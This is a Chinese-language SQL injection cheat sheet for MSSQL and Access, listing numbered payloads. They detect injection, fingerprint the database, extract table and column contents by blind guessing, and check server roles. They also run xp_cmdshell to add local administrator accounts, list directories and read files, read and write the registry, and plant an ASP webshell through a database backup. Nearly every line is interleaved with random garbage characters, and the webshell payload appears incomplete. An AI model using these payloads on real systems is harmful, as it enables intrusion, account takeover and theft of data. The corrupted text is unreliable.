1.判断是否有注入;and 1=1 ;and 1=2 �^&�eF916H
2.初步判断是否是mssql ;and user>0 �k5S;G"i�J
&$~fz":1!
3.注入参数是字符'and [查询条件] and ''=' C �5.3��[�
LlQsc{�Ddf
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 6L<:>��55�
3^o(\=-JX�
5.判断数据库系统 k6K�c{kY��
=:W�ZV8@%�
;and (select count(*) from sysobjects)>0 mssql 8v"�rM�
>[
�e�bk>e*�
;and (select count(*) from msysobjects)>0 access *DF3�juf~�
Y.viO��HL
�qk�(Ey�p
[A-��_?#cZ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 N��n. 9�J�
dDa��V2:4E
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 K~�
eak�\=
D|LO��!,=b
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 OM\J4"YV�$
b{�A[\� "�
9.(1)猜字段的ascii值(access) J�s�,�!��G
p27Dc��wov
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )O1��]|r7v
Xsq@E#@�S
(2)猜字段的ascii值(mssql) ��*'�/��,�
�0�WUBj:@g
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 k)p`�x�"To
��B@,�r8)D
10.测试权限结构(mssql) ?*f��a5=ql
�Ww]$zd-bo
;�'"'|} xn
$p0nq��&4c
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- A�WR :�~{�
2}vi�bDq p
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- tD�K@?PfKz
Q]k<��Y���
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- B5lwQp]���
�+�Iyyk02V
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- r6DLShP-Ur
U z�y@�\
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- MKHnA|uQ](
�\<LCp;- K
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 9p{�4-�]��
#t�+�?eye~
;and 1=(select IS_MEMBER('db_owner'));-- :5t��4K�cQ
#I�/�P�9)4
Q�a{5�]�+E
1V%�tev9�a
11.添加mssql和系统的帐户 jRK}H*u�em
Y �<6|z3��
;exec master.dbo.sp_addlogin username;-- 6j%%CWU{~�
;exec master.dbo.sp_password null,username,password;-- ��U��4�!bW
#�"gt�&t9Q
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- "�<CM�'R��
}.��&n�Ei`
;exec master.dbo.xp_cmdshell 'net user username password c�lE�9I<1v
�n�1�-p/a.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 2f�,8Jn�ia
='7m$,{(Q[
;exec master.dbo.xp_cmdshell 'net user username password /add';-- -$�d?e%}�#
c#OxI*,�+/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ? ��x%s
j
K.�Xy:l�*z
�h3MdQlJ�&
�:@�L7RZ`_
12.(1)遍历目录 �}�L���Uvh
F&��M��d+2
;create table dirs(paths varchar(100), id int) '��n� &p5%
�`�~GXK��
;insert dirs exec master.dbo.xp_dirtree 'c:\' ?W��I �v4�
/vQ)$;�xf#
;and (select top 1 paths from dirs)>0 V}E['fzBFV
!nm�Z"n|}p
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �X|o��f87�
<y�6`8J�7:
P�QH�z�tS"
-)V0D,r$[
(2)遍历目录 �,1��-%C�)
Y+-yIMt$r
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �*lfjsrP�u
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 S^�QEc�tXU
q�\fbrv%I4
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 J�X�59n%$@
K�9<�8FSn
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 a5a
;Fp
(XZ[-��M7
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 GBz��?�$]6
*p�{p.%Qs:
j�+�jC
�J<
ndSu�-8?L�
13.mssql中的存储过程 ��CsR[@&n'
mF6-f#t>H+
xp_regenumvalues 注册表根键, 子键 6uRE9��h|�
3D|L�b]=��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �H��Sruue8
<�����a� R
xp_regread 根键,子键,键值名 ��U�ylIx�d
!yN�U�-/�K
;exec xp_regread l6�'��K�Ig
1mFH�7A�($
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 '(]W�tx%9"
,�N$�Q']Td
xp_regwrite 根键,子键, 值名, 值类型, 值 NEB�h��Vh
Qf:��e;1F!
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��]�[
$UN�
��S>lP?2J�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 +)c<s3OC�E
`,O7�S9]R+
xp_regdeletevalue 根键,子键,值名 R���@\fqNq
��_S_,rTf&
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �gwaSgV$�z
xF_�u:�}7`
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 I�OHWb&�N6
O"\4�[�HE^
?q!4�RE�M
Ar��%*�NxX
14.mssql的backup创建webshell M6-uTmN:d�
$�QiM�A,��
use model �d�sIbr"�m
eF3�NyL�(A
create table cmd(str image); �B�)q�}]Qn
�a��^_K�@�
insert into cmd(str) values (''); U&�3!�=|j�
I
Fw7��?G,
backup database model to disk='c:\l.asp'; ~�<�1s[Hu
'i�M�zp]V;
+*�.*b���o
)K�x.v���'
15.mssql内置函数 e�C/{c1�C�
�AQ��-�PHv
;and (select @@version)>0 获得Windows的版本号 \�>$z�xC_
?y|&Mz'XJ(
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Zb�o�4{.#�
ZK4�V-?/[6
;and (select user_name())>0 爆当前系统的连接用户 7(/yyZQn�Z
aZf/Wi�R2
;and (select db_name())>0 得到当前连接的数据库 (j�>�`+F5f
DY�`0 `T��
3]S*p Er�Y
:$I���"n\
16.简洁的webshell ��0�\i\G|5
6jpz�yf�=~
use model &>-'�|(m+2
�:[a*I6�/^
create table cmd(str image); f@sC~A. 9\
'@t,G,F�J
insert into cmd(str) values (''); ��C�
b'�|
�\�BBs;z[/
backup database model to disk='g:\wwwtest\l.asp';
